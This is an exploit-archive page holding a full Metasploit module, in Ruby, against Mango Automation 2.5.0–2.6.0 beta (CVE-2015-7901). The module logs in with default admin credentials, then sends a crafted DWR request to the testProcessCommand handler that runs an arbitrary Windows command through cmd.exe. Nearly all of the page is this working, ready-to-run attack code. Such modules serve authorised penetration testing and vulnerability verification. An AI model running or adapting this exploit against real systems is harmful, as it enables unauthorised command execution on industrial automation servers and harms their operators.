Infinite Automation / Mango Automation - Command Injection Exploit

2017-10-13
ID: 94477
CVE: None
Download vulnerable application: None
require 'msf/core'
  class MetasploitModule < Msf::Auxiliary
    Rank = GreatRanking
      include Msf::Exploit::Remote::HttpClient
      def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Infinite Automation Mango Automation Command Injection',
            'Description'    => %q{
                This module exploits a command injection vulnerability found in Infinite
                Automation Systems Mango Automation v2.5.0 - 2.6.0 beta (builds prior to
                430).
            },
            'Author'         => [ 'james fitts' ],
            'License'        => MSF_LICENSE,
            'References'     =>
                [
                    [ 'CVE', '2015-7901' ],
                    [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-15-300-02' ]
                ],
            'DisclosureDate' => 'Oct 28 2015'))
          register_options(
            [
                Opt::RPORT(8080),
                OptString.new('TARGETURI', [ false, 'Base path to Mango Automation', '/login.htm']),
                OptString.new('CMD', [ false, 'The OS command to execute', 'calc.exe']),
                OptString.new('USER', [true, 'The username to login with', 'admin']),
                OptString.new('PASS', [true, 'The password to login with', 'admin']),
            ], self.class )
    end
      def do_login(user, pass)
        uri =  normalize_uri(target_uri.path)
                  res = send_request_cgi({
            'method'    =>   'GET',
            'uri'           =>   uri
        })
          if res.nil?
            vprint_error("#{peer} - Connection timed out")
            return :abort
        end
          cookie = res.headers['Set-Cookie']
          print_status("Attempting to login with credentials '#{user}:#{pass}'")
          res = send_request_cgi({
            'method'    =>   'POST',
            'uri'           =>   uri,
            'cookie'    =>   cookie,
            'vars_post'     =>   {
                'username'  =>   user,
                'password'  =>   pass,
            }
        })
          if res.nil?
            vprint_error("#{peer} - Connection timed out")
            return :abort
        end
          location = res.headers['Location']
        if res and res.headers and (location = res.headers['Location']) and location =~ /data_point_details.shtm/
            print_good("#{peer} - Successful login: '#{user}:#{pass}'")
        else
            vprint_error("#{peer} - Bad login: '#{user}:#{pass}'")
            return
        end
          return cookie
              end
      def run
        cookie = do_login(datastore['USER'], datastore['PASS'])
          data =  "callCount=1&"
        data << "page=%2Fevent_handlers.shtm&"
        data << "httpSessionId=%0D%0A&"
        data << "scriptSessionId=26D579040C1C11D2E21D1E5F321094E5866&"
        data << "c0-scriptName=EventHandlersDwr&"
        data << "c0-methodName=testProcessCommand&"
        data << "c0-id=0&"
        data << "c0-param0=string:c:\\windows\\system32\\cmd.exe /c #{datastore['CMD']}&"
        data << "c0-param1=string:15&"
        data << "batchId=24"
          res = send_request_raw({
            'method'    =>   'POST',
            'uri'           =>   normalize_uri("dwr", "call", "plaincall", "EventHandlersDwr.testProcessCommand.dwr"),
            'cookie'    =>   cookie.split(";")[0],
            'ctype'     =>   "application/x-www-form-urlencoded",
            'headers'   =>   {
                'Origin'    =>   'null',
                'Upgrade-Insecure-Requests' =>   1,
                'Connection'    => "keep-alive"
            },
            'data'  =>   data,
        }, 5)
          if res.body =~ /org.directwebremoting.extend.MarshallException/
            print_error("Something went wrong...")
            puts res.body
        elsif res.body =~ /Check your Tomcat console for process output/
            print_good("Command executed successfully")
        end
      end
end
1-4-2 (www02)